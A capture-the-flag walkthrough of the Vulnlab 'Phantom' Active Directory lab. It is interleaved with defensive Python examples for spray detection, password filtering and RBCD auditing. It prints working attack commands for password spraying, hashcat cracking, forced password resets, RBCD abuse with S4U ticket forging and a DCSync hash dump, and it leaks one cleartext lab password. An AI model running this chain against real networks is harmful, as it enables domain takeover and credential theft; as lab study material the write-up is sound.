Phantom — Vulnlab Full Walkthrough (TjNull list)
This writeup covers a comprehensive, multi-step penetration testing assessment targeting a complex enterprise network. The attack path demonstrates how minor initial oversights—such as unauthenticated network shares and weak password policies—can chain together to allow a complete takeover of an Active Directory domain. The compromise lifecycle moves from basic SMB enumeration and password spraying to offline cryptographic cracking and advanced Resource-Based Constrained Delegation (RBCD) exploitation.
Welcome, reader. Today we’ll hack Phantom from Vulnlab: Windows, Medium, by ar0x4.
Enumeration
Let’s start with a full port nmap scan.
Nmap scan report for 10.10.74.183 (10.10.74.183)
Host is up, received user-set (0.18s latency).
Scanned at 2024-10-10 09:21:38 PKT for 619s
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-10-10 04:29:53Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: phantom.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: PHANTOM
| NetBIOS_Domain_Name: PHANTOM
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: phantom.vl
| DNS_Computer_Name: DC.phantom.vl
| DNS_Tree_Name: phantom.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-10-10T04:31:13+00:00
| ssl-cert: Subject: commonName=DC.phantom.vl
| Issuer: commonName=DC.phantom.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-05T19:49:21
| Not valid after: 2025-01-04T19:49:21
| MD5: 20b2:6e9b:d25b:051a:c734:2ea8:1929:cebe
| SHA-1: 8a5d:0167:e13a:84de:8d99:d55e:71ca:4967:d5ed:59b8
| -----BEGIN CERTIFICATE-----
| MIIC3jCCAcagAwIBAgIQYf5wIHhjqJ5IA4lUSwlUIzANBgkqhkiG9w0BAQsFADAY
| MRYwFAYDVQQDEw1EQy5waGFudG9tLnZsMB4XDTI0MDcwNTE5NDkyMVoXDTI1MDEw
| NDE5NDkyMVowGDEWMBQGA1UEAxMNREMucGhhbnRvbS52bDCCASIwDQYJKoZIhvcN
| AQEBBQADggEPADCCAQoCggEBAMA8vPTkukVbvxXxp/V+N7cx+cequ2q7oT0am6tO
| UHH37XVXO6x2Ndt8hK9ty4gBr1BFbjCGX21TIa1C7IEe95IvpCMIbxUdaqMGss4Y
| EnFiJJiH6HdjEaHmms5ENzQdPldz3cBfIfagK1pTUUVynFzheRIIk/Y5D5X4GSxr
| Utr7wTIZn0rc/3yZSdVi3fCcDKBACwIInYr0S/N9fFb03OO7wi2+vs/Qiq49yxar
| TD/GR5SMOdR+ZK+Pw+fFPn04NCGIL6WrQFczR3Z3/w+paD+k7LFuoiLcB59w9+et
| NFf0kV/zYX2AJv9PCznmHtfwjWBk6aitJ5CHysvjst1Gpx0CAwEAAaMkMCIwEwYD
| VR0lBAwwCgYIKwYBBQUHAwEwCwYDVR0PBAQDAgQwMA0GCSqGSIb3DQEBCwUAA4IB
| AQBYK45hNioFPjz9IpeVs5rybWi9AcDIUJamsU+csyv5o/goVRmf3j7lR7fG2coT
| WIYHRJhaz0/TLzbxWi9ux5lHmvXfr3aiBQKTo3K2HE0PCnUJ+yCftN19tm2vMvi8
| sMKuXuAShgyrbvg49njeTbBHi5q1nNZlS8m6ZxBnZ1eEFZoqVMqTMtd5T4XyyaOC
| OeDWvrXiZcMIJdZGAofTYDQjgrkG1yKxIZ32cZpp8OtDncRxfv+PEoH08B0oeRtk
| GCc7C4WEkMsjNMcfjNmMO0tRlhOU19YlRANffaM0gtDfRTqV7xos8XIqX+3JuZWf
| gkuzd+cf8gfrRullHsu18Ik/
|_-----END CERTIFICATE-----
|_ssl-date: 2024-10-10T04:31:51+00:00; -1s from scanner time.
5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49710/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49834/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
SMB — 445
Listing SMB shares with anonymous access.
/home/daffy 10.8.3.192 # crackmapexec smb 10.10.74.183 -u guest -p '' --shares
SMB 10.10.74.183 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB 10.10.74.183 445 DC [+] phantom.vl\guest:
SMB 10.10.74.183 445 DC [+] Enumerated shares
SMB 10.10.74.183 445 DC Share Permissions Remark
SMB 10.10.74.183 445 DC ----- ----------- ------
SMB 10.10.74.183 445 DC ADMIN$ Remote Admin
SMB 10.10.74.183 445 DC C$ Default share
SMB 10.10.74.183 445 DC Departments Share
SMB 10.10.74.183 445 DC IPC$ READ Remote IPC
SMB 10.10.74.183 445 DC NETLOGON Logon server share
SMB 10.10.74.183 445 DC Public READ
SMB 10.10.74.183 445 DC SYSVOL Logon server share
We have read access to Public and IPC$. Public looks more interesting, so let’s take a look at that share.
/home/daffy 10.8.3.192 # impacket-smbclient phantom.vl/guest@phantom.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# use Public
# ls
drw-rw-rw- 0 Thu Jul 11 20:03:14 2024 .
drw-rw-rw- 0 Sun Jul 7 13:39:30 2024 ..
-rw-rw-rw- 14565 Sat Jul 6 21:09:28 2024 tech_support_email.eml
# get tech_support_email.eml
I found a tech_support_email.eml file and downloaded it to my attacking machine. It is an email from Lucas asking everyone to use a new template he made, with the template attached as base64. I saved the base64 text and decoded it back into a PDF.
cat file-base64 | base64 -d > welcome_template.pdf
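As an added example (not part of the original writeup), here is how I would pull such an attachment out of an .eml without trusting the declared file type: the stdlib email parser undoes the base64 transfer encoding, the attachment’s first bytes are checked against known magic values, and a filename with directory components is reduced to its basename before anything is written to disk. The message itself is constructed inline as a stand-in for tech_support_email.eml; the addresses and the placeholder PDF bytes are made up.

```python
import email
from email import policy
from email.message import EmailMessage
from pathlib import Path

# Magic values for the attachment types a helpdesk mailbox usually sees.
MAGIC = [
    (b"%PDF", "pdf"),
    (b"PK\x03\x04", "zip/ooxml"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2"),
    (b"MZ", "pe"),
]
EXT_TO_TYPE = {".pdf": "pdf", ".zip": "zip/ooxml", ".docx": "zip/ooxml",
               ".xlsx": "zip/ooxml", ".doc": "ole2", ".xls": "ole2", ".exe": "pe"}


def sniff(data: bytes) -> str:
    """Identify content by its leading bytes, not by its name or MIME type."""
    for magic, label in MAGIC:
        if data.startswith(magic):
            return label
    return "unknown"


def build_sample_eml() -> bytes:
    """Constructed stand-in for tech_support_email.eml: text body + base64 PDF attachment."""
    msg = EmailMessage()
    msg["From"] = "lucas@example.invalid"          # made-up sender
    msg["To"] = "helpdesk@example.invalid"         # made-up recipient
    msg["Subject"] = "New onboarding template"
    msg.set_content("Hi, please use the attached welcome template from now on.")
    fake_pdf = b"%PDF-1.4\n% constructed placeholder, not a real PDF document\n%%EOF\n"
    # add_attachment base64-encodes binary parts, exactly what we saw in the .eml.
    msg.add_attachment(fake_pdf, maintype="application", subtype="pdf",
                       filename="welcome_template.pdf")
    return msg.as_bytes()


def extract_attachments(raw: bytes) -> list:
    """Return one record per attachment: name, declared type, sniffed type, mismatch flag, bytes."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    found = []
    for part in msg.iter_attachments():
        data = part.get_content()                 # parser has already undone the base64
        if isinstance(data, str):
            data = data.encode(part.get_content_charset() or "utf-8")
        name = Path(part.get_filename() or "unnamed").name   # drop any directory component
        detected = sniff(data)
        expected = EXT_TO_TYPE.get(Path(name).suffix.lower())
        found.append({"filename": name,
                      "declared": part.get_content_type(),
                      "detected": detected,
                      "size": len(data),
                      "mismatch": expected is not None and expected != detected,
                      "data": data})
    return found


def save_attachments(raw: bytes, outdir: str) -> list:
    """Write each attachment under outdir using only its basename; return the paths written."""
    out = Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    paths = []
    for att in extract_attachments(raw):
        target = out / att["filename"]
        target.write_bytes(att["data"])
        paths.append(str(target))
    return paths


if __name__ == "__main__":
    for att in extract_attachments(build_sample_eml()):
        flag = "  <-- extension does not match content" if att["mismatch"] else ""
        print(f'{att["filename"]}: declared {att["declared"]}, '
              f'looks like {att["detected"]}, {att["size"]} bytes{flag}')
```

Run against the real file with `extract_attachments(open("tech_support_email.eml", "rb").read())`; the mismatch flag is the part worth keeping around, since an attachment whose bytes disagree with its extension is the first thing to look at when triaging a suspicious mail.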
There is a password in the template as well. I used --rid-brute to enumerate the domain’s users and stored them in a file named users.
crackmapexec smb 10.10.74.183 -u guest -p '' --rid-brute
Now we can spray that password against all the users using crackmapexec.
/home/daffy/Documents/Raw 10.8.3.192 # crackmapexec smb 10.10.74.183 -u users -p '<REDACTED>' --continue-on-success
SMB 10.10.74.183 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
< ... SNIP ... >
SMB 10.10.74.183 445 DC [-] phantom.vl\ppayne:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.74.183 445 DC [+] phantom.vl\ibryant:<REDACTED> <-- Password Found
SMB 10.10.74.183 445 DC [-] phantom.vl\ssteward:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.74.183 445 DC [-] phantom.vl\wstewart:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.74.183 445 DC [-] phantom.vl\vhoward:<REDACTED> STATUS_LOGON_FAILURE
SMB 10.10.74.183 445 DC [-] phantom.vl\crose:<REDACTED> STATUS_LOGON_FAILURE
< ... SNIP ... >
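From the defender’s side, the spray above leaves a very recognisable trace on the DC: one source address, many distinct accounts failing within a short window, then one success from the same source. The following added example (not from the original writeup) runs that logic over a few constructed Security-log records exported as JSON lines; the account names and the 10.8.3.192 source are taken from the output above, the timestamps and the jdoe background noise are made up.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security events as JSON lines (not real lab telemetry).
# 4625 = failed logon, 4624 = successful logon; LogonType 3 (network) is what SMB
# authentication produces. jdoe is a legitimate user mistyping a password twice.
SAMPLE_LOG = """\
{"time":"2024-10-10T09:35:01Z","EventID":4625,"TargetUserName":"ppayne","IpAddress":"10.8.3.192","LogonType":3}
{"time":"2024-10-10T09:35:01Z","EventID":4625,"TargetUserName":"jdoe","IpAddress":"10.10.74.50","LogonType":3}
{"time":"2024-10-10T09:35:02Z","EventID":4625,"TargetUserName":"ssteward","IpAddress":"10.8.3.192","LogonType":3}
{"time":"2024-10-10T09:35:03Z","EventID":4624,"TargetUserName":"ibryant","IpAddress":"10.8.3.192","LogonType":3}
{"time":"2024-10-10T09:35:03Z","EventID":4625,"TargetUserName":"wstewart","IpAddress":"10.8.3.192","LogonType":3}
{"time":"2024-10-10T09:35:04Z","EventID":4625,"TargetUserName":"vhoward","IpAddress":"10.8.3.192","LogonType":3}
{"time":"2024-10-10T09:35:05Z","EventID":4625,"TargetUserName":"crose","IpAddress":"10.8.3.192","LogonType":3}
{"time":"2024-10-10T09:36:10Z","EventID":4625,"TargetUserName":"jdoe","IpAddress":"10.10.74.50","LogonType":3}
{"time":"2024-10-10T09:36:20Z","EventID":4624,"TargetUserName":"jdoe","IpAddress":"10.10.74.50","LogonType":3}
"""


def parse_log(text: str) -> list:
    """Parse JSON lines into dicts with a timezone-aware datetime, sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        e["time"] = datetime.fromisoformat(e["time"].replace("Z", "+00:00"))
        events.append(e)
    return sorted(events, key=lambda e: e["time"])


def detect_spray(events: list, window=timedelta(seconds=60), min_accounts: int = 5) -> list:
    """Flag a source that fails against >= min_accounts distinct accounts inside `window`.

    A success from the same source during the burst (or within one window after it)
    is reported separately: that is the account whose password was guessed."""
    fails, succ = defaultdict(list), defaultdict(list)
    for e in events:
        if e.get("LogonType") != 3:
            continue
        if e["EventID"] == 4625:
            fails[e["IpAddress"]].append(e)
        elif e["EventID"] == 4624:
            succ[e["IpAddress"]].append(e)

    findings = []
    for src, fl in fails.items():
        best, lo = None, 0
        for hi in range(len(fl)):                        # sliding window over sorted failures
            while fl[hi]["time"] - fl[lo]["time"] > window:
                lo += 1
            accounts = {e["TargetUserName"] for e in fl[lo:hi + 1]}
            if len(accounts) >= min_accounts and (best is None or len(accounts) > len(best[0])):
                best = (accounts, fl[lo]["time"], fl[hi]["time"])
        if best is None:
            continue
        accounts, first, last = best
        hits = sorted({e["TargetUserName"] for e in succ.get(src, [])
                       if first <= e["time"] <= last + window})
        findings.append({"source": src, "accounts": sorted(accounts),
                         "first": first, "last": last, "succeeded": hits})
    return findings


if __name__ == "__main__":
    for f in detect_spray(parse_log(SAMPLE_LOG)):
        print(f'{f["source"]}: {len(f["accounts"])} accounts failed between '
              f'{f["first"]:%H:%M:%S} and {f["last"]:%H:%M:%S}; succeeded as {f["succeeded"]}')
```

The thresholds are the tuning knobs: a helpdesk NAT address will produce many distinct failing accounts over an hour, but rarely five within a minute, so keep the window short and alert on the success-after-burst case first.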
VeraCrypt
Listing SMB shares again with new user ibryant.
/home/daffy/Documents/Raw 10.8.3.192 # crackmapexec smb 10.10.74.183 -u ibryant -p '<REDACTED>' --shares
SMB 10.10.74.183 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
SMB 10.10.74.183 445 DC [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
SMB 10.10.74.183 445 DC [+] Enumerated shares
SMB 10.10.74.183 445 DC Share Permissions Remark
SMB 10.10.74.183 445 DC ----- ----------- ------
SMB 10.10.74.183 445 DC ADMIN$ Remote Admin
SMB 10.10.74.183 445 DC C$ Default share
SMB 10.10.74.183 445 DC Departments Share READ
SMB 10.10.74.183 445 DC IPC$ READ Remote IPC
SMB 10.10.74.183 445 DC NETLOGON READ Logon server share
SMB 10.10.74.183 445 DC Public READ
SMB 10.10.74.183 445 DC SYSVOL READ Logon server share
While enumerating the Departments Share I found a VeraCrypt container at Departments Share/IT/Backup/IT_BACKUP_201123.hc. There is also a VeraCrypt .deb package that we can use to install it on our attacking machine and mount the container; a different version can be downloaded to match your system.
VeraCrypt is a free, open-source disk encryption tool that helps protect data from unauthorized access.
/home/daffy/Downloads 10.8.3.192 # impacket-smbclient phantom.vl/ibryant:'<REDACTED>'@phantom.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use Departments Share
# ls
drw-rw-rw- 0 Sat Jul 6 21:25:31 2024 .
drw-rw-rw- 0 Sun Jul 7 13:39:30 2024 ..
drw-rw-rw- 0 Sat Jul 6 21:25:11 2024 Finance
drw-rw-rw- 0 Sat Jul 6 21:21:31 2024 HR
drw-rw-rw- 0 Thu Jul 11 19:59:02 2024 IT
# cd IT/Backup
# ls
drw-rw-rw- 0 Sat Jul 6 23:04:34 2024 .
drw-rw-rw- 0 Thu Jul 11 19:59:02 2024 ..
-rw-rw-rw- 12582912 Sat Jul 6 23:04:34 2024 IT_BACKUP_201123.hc
The container is password protected, so it’s time to do some cracking ;) Running the full rockyou list against it would take very long, so I did some thinking and built candidates from the company name combined with the year and special characters. Let’s create a password list.
phantom
Phantom
Ph4ntom
Ph4nt0m
And a hashcat rule file that appends the year and a special character to each word.
$2 $0 $2 $3 $!
$2 $0 $2 $3 $@
$2 $0 $2 $3 $#
$2 $0 $2 $3 $$
$2 $0 $2 $3 $%
$2 $0 $2 $3 $^
$2 $0 $2 $3 $&
$2 $0 $2 $3 $*
$2 $0 $2 $3 $(
$2 $0 $2 $3 $)
$2 $0 $2 $3 $-
$2 $0 $2 $3 $=
$2 $0 $2 $3 $+
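The `$X` function in a hashcat rule appends one character, so each rule line above turns a base word into word + 2023 + symbol, and 4 words × 13 rules give the 52 candidates hashcat reports in its Progress line. The added example below (mine, not from the writeup) implements that rule subset plus a few neighbouring functions (`c`, `u`, `l`, `t`, `r`, `d`, `^X`, `sXY`) and turns it into a check a defender can run against proposed passwords: anything the word list and rules generate is a password the organisation should ban. Rule semantics follow hashcat’s documented functions; this is a toy interpreter, not hashcat itself, and rule arguments containing whitespace are not supported.

```python
from typing import Optional

# Base words and rules exactly as used above: four spellings of the company name and
# thirteen rules that each append the year 2023 and one special character.
BASE_WORDS = ["phantom", "Phantom", "Ph4ntom", "Ph4nt0m"]
RULES = ["$2 $0 $2 $3 $" + c for c in "!@#$%^&*()-=+"]


def apply_rule(word: str, rule: str) -> Optional[str]:
    """Apply one hashcat-style rule line (space-separated functions) to a word.

    Supported: ':' no-op, 'l' lowercase, 'u' uppercase, 'c' capitalize, 't' toggle case,
    'r' reverse, 'd' duplicate, '$X' append X, '^X' prepend X, 'sXY' replace X with Y.
    Returns None for an unsupported function so the caller can reject the rule."""
    for fn in rule.split():
        op, arg = fn[0], fn[1:]
        if op == ":":
            continue
        if op == "l" and not arg:
            word = word.lower()
        elif op == "u" and not arg:
            word = word.upper()
        elif op == "c" and not arg:
            word = word[:1].upper() + word[1:].lower()
        elif op == "t" and not arg:
            word = word.swapcase()
        elif op == "r" and not arg:
            word = word[::-1]
        elif op == "d" and not arg:
            word = word * 2
        elif op == "$" and len(arg) == 1:
            word = word + arg
        elif op == "^" and len(arg) == 1:
            word = arg + word
        elif op == "s" and len(arg) == 2:
            word = word.replace(arg[0], arg[1])
        else:
            return None
    return word


def expand(words, rules) -> list:
    """Every (word, rule) combination, in word-major order; unsupported rules are skipped."""
    out = []
    for w in words:
        for r in rules:
            candidate = apply_rule(w, r)
            if candidate is not None:
                out.append(candidate)
    return out


def is_guessable(password: str, words=BASE_WORDS, rules=RULES) -> bool:
    """Banned-password check: True if the word list + rules would produce this password."""
    return password in set(expand(words, rules))


if __name__ == "__main__":
    candidates = expand(BASE_WORDS, RULES)
    print(f"{len(candidates)} candidates, e.g. {candidates[0]} ... {candidates[-1]}")
    for pw in ("Ph4nt0m2023!", "Tq9#vLm2!zR"):
        print(pw, "->", "guessable" if is_guessable(pw) else "not in this candidate space")
```

A password filter fed with the organisation’s own name, product names and the current and previous year, expanded with rules like these, catches the whole family of passwords that cracked here in six seconds.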
Let’s give it a go.
~ $ hashcat -m 13721 IT_BACKUP_201123.hc passwords -r phantom.rule
...SNIP...
IT_BACKUP_201123.hc:<REDACTED>
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13721 (VeraCrypt SHA512 + XTS 512 bit (legacy))
Hash.Target......: IT_BACKUP_201123.hc
Time.Started.....: Thu Oct 10 11:15:40 2024 (6 secs)
Time.Estimated...: Thu Oct 10 11:15:46 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (passwords)
Guess.Mod........: Rules (phantom.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1 H/s (0.28ms) @ Accel:256 Loops:62 Thr:256 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4/52 (7.69%)
Rejected.........: 0/4 (0.00%)
Restore.Point....: 0/4 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:499968-499999
Candidate.Engine.: Device Generator
Candidates.#1....: phantom2023! -> Ph4nt0m2023!
Hardware.Mon.#1..: Temp: 48c Util: 78% Core:1830MHz Mem:6000MHz Bus:8
Started: Thu Oct 10 11:15:33 2024
Stopped: Thu Oct 10 11:15:47 2024
We successfully cracked the password. Let’s mount the file and see what’s hidden in there.
Initial Foothold
I copied vyos_backup.tar.gz to my local storage, extracted it, and found a password for the user lstanley in /config/config.boot.
authentication {
    local-users {
        username lstanley {
            password "<REDACTED>"
        }
    }
}
I couldn’t log in anywhere with that user, so I sprayed the password across the user list once again with crackmapexec.
~ $ crackmapexec smb phantom.vl -u users -p '<REDACTED>' --continue-on-success
SMB phantom.vl 445 DC [+] phantom.vl\svc_sspr:<REDACTED>
Now we can log in with WinRM and grab the user flag. I also ran bloodhound-python to enumerate the Active Directory.
*Evil-WinRM* PS C:\Users\svc_sspr\Desktop> more user.txt
VL{<FLAGGED>}
/home/daffy/Documents/Raw 10.8.3.192 # bloodhound-python -u "ibryant" -p '<REDACTED>' -d phantom.vl -c all --zip -ns 10.10.74.183
INFO: Found AD domain: phantom.vl
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc.phantom.vl:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc.phantom.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.phantom.vl
INFO: Found 30 users
INFO: Found 61 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.phantom.vl
INFO: Done in 00M 42S
INFO: Compressing output into 20241010114830_bloodhound.zip
Privilege Escalation
The user svc_sspr has ForceChangePassword over wsilva and two other users, all of whom are members of the ICT Security group.
The ICT Security group has AddAllowedToAct object control over dc.phantom.vl, which we can abuse to obtain administrator privileges with a resource-based constrained delegation attack.
ForceChangePassword
We will use the net binary for this one. net is a tool for the administration of Samba and remote CIFS servers.
~ $ net rpc password "WSILVA" 'Admin123!' -U phantom.vl/svc_sspr%<REDACTED> -S phantom.vl
No error means the command ran successfully.
Resource-based constrained delegation (RBCD) with an SPN-less account
This article explains the attack very well. First we perform the normal RBCD write, but instead of passing a machine account in the -delegate-from option, we pass the user wsilva.
~ $ impacket-rbcd -delegate-from 'wsilva' -delegate-to 'DC$' -dc-ip '10.10.74.183' -action 'write' 'phantom.vl'/'wsilva':'Admin123!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Accounts allowed to act on behalf of other identity:
[*] wsilva (S-1-5-21-4029599044-1972224926-2225194048-1114)
[*] wsilva can already impersonate users on DC$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*] wsilva (S-1-5-21-4029599044-1972224926-2225194048-1114)
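The rbcd output lists the trustees held in DC$’s msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which is a self-relative Windows security descriptor. Auditing that attribute is the defender’s counterpart of this step: a plain user account (no SPN, not a computer) in the DACL of a domain controller is exactly the pattern used here. The added example below (mine, not from the writeup and not impacket’s code) builds such a descriptor from SIDs, parses it back ACE by ACE, and flags trustees that the directory does not know as computer accounts. wsilva’s SID is the one printed above; the WEB01$ computer with RID 1105, the SID-to-account mapping and the 0x000F01FF access mask are constructed for the example.

```python
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00

WSILVA_SID = "S-1-5-21-4029599044-1972224926-2225194048-1114"   # from the rbcd output above
WEB01_SID = "S-1-5-21-4029599044-1972224926-2225194048-1105"    # hypothetical computer account
# Constructed stand-in for an LDAP lookup of objectSid -> (sAMAccountName, is computer object).
DIRECTORY = {WSILVA_SID: ("wsilva", False), WEB01_SID: ("WEB01$", True)}


def sid_to_bytes(sid: str) -> bytes:
    """Text SID -> binary: revision, sub-authority count, 6-byte big-endian authority, LE subs."""
    parts = sid.split("-")
    assert parts[0] == "S" and parts[1] == "1", "unsupported SID format"
    authority, subs = int(parts[2]), [int(p) for p in parts[3:]]
    return (bytes([1, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf: bytes, off: int):
    """Binary SID at buf[off:] -> (text SID, offset just past it)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), off + 8 + 4 * count


def build_sd(trustee_sids, owner_sid="S-1-5-32-544", mask=0x000F01FF) -> bytes:
    """Self-relative SD with an owner and a DACL of one ACCESS_ALLOWED ACE per trustee.
    The owner and mask values are assumptions for the example, not read from the lab."""
    aces = b""
    for sid in trustee_sids:
        body = struct.pack("<I", mask) + sid_to_bytes(sid)
        aces += struct.pack("<BBH", ACCESS_ALLOWED_ACE_TYPE, 0, 4 + len(body)) + body
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(trustee_sids), 0) + aces
    owner = sid_to_bytes(owner_sid)
    owner_off = 20                                  # header is 20 bytes
    dacl_off = owner_off + len(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, 0, 0, dacl_off)  # no group, no SACL
    return header + owner + acl


def parse_sd(buf: bytes) -> dict:
    """Walk the self-relative SD: owner SID and every ACE in the DACL."""
    _rev, _sbz1, control, owner_off, _group_off, _sacl_off, dacl_off = struct.unpack_from("<BBHIIII", buf, 0)
    result = {"owner": None, "aces": []}
    if owner_off:
        result["owner"], _ = sid_from_bytes(buf, owner_off)
    if control & SE_DACL_PRESENT and dacl_off:
        _, _, _acl_size, ace_count, _ = struct.unpack_from("<BBHHH", buf, dacl_off)
        off = dacl_off + 8
        for _ in range(ace_count):
            ace_type, _flags, ace_size = struct.unpack_from("<BBH", buf, off)
            if ace_type == ACCESS_ALLOWED_ACE_TYPE:
                (mask,) = struct.unpack_from("<I", buf, off + 4)
                sid, _ = sid_from_bytes(buf, off + 8)
                result["aces"].append({"type": "ACCESS_ALLOWED", "mask": mask, "sid": sid})
            else:                                   # keep the walk aligned on unknown ACE types
                result["aces"].append({"type": "OTHER(%d)" % ace_type, "mask": None, "sid": None})
            off += ace_size
    return result


def audit_rbcd(sd_buf: bytes, directory: dict) -> list:
    """Resolve each trustee; anything that is not a computer account is suspicious on a DC."""
    findings = []
    for ace in parse_sd(sd_buf)["aces"]:
        name, is_computer = directory.get(ace["sid"], ("<unresolved>", False))
        findings.append({"sid": ace["sid"], "name": name, "mask": ace["mask"],
                         "suspicious": not is_computer})
    return findings


SAMPLE_SD = build_sd([WSILVA_SID, WEB01_SID])   # constructed attribute value for the demo

if __name__ == "__main__":
    for f in audit_rbcd(SAMPLE_SD, DIRECTORY):
        print(f'{f["name"]:8} {f["sid"]}  mask=0x{f["mask"]:08x}  '
              f'{"SUSPICIOUS: not a computer account" if f["suspicious"] else "ok"}')
```

In production the bytes come from an LDAP read of msDS-AllowedToActOnBehalfOfOtherIdentity on each computer object, and the directory mapping from resolving the SIDs; a non-empty attribute on any domain controller deserves an alert on its own, and a user trustee in it is a finding.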
Then we need to obtain a TGT for wsilva through overpass-the-hash, so that the ticket uses RC4 (the account’s NT hash is the key).
~ $ impacket-getTGT -hashes :$(pypykatz crypto nt 'Admin123!') 'phantom.vl'/'wsilva'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in wsilva.ccache
~ $ export KRB5CCNAME=wsilva.ccache
Now we read the TGT session key.
~ $ impacket-describeTicket 'wsilva.ccache' | grep 'Ticket Session Key'
[*] Ticket Session Key : 0b13e9062cd35e8b5c8a01d0b33e379f
Now we set the NT hash of the controlled SPN-less account (wsilva) to the TGT session key.
~ $ impacket-changepasswd -newhashes :0b13e9062cd35e8b5c8a01d0b33e379f 'phantom.vl'/'wsilva':'Admin123!'@'phantom.vl'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Changing the password of phantom.vl\wsilva
[*] Connecting to DCE/RPC as phantom.vl\wsilva
[*] Password was changed successfully.
[!] User will need to change their password on next logging because we are using hashes.
Obtaining the delegated service ticket through S4U2self+U2U, followed by S4U2proxy.
~ $ impacket-getST -k -no-pass -u2u -impersonate "Administrator" -spn "cifs/DC.phantom.vl" 'phantom.vl'/'wsilva'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache
~ $ export KRB5CCNAME=Administrator@cifs_DC.phantom.vl@PHANTOM.VL.ccache
Now we can use that ticket to perform a DCSync attack and dump all the hashes, including the Administrator NT hash.
~ $ crackmapexec smb dc.phantom.vl --use-kcache --ntds
SMB phantom.vl 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:False)
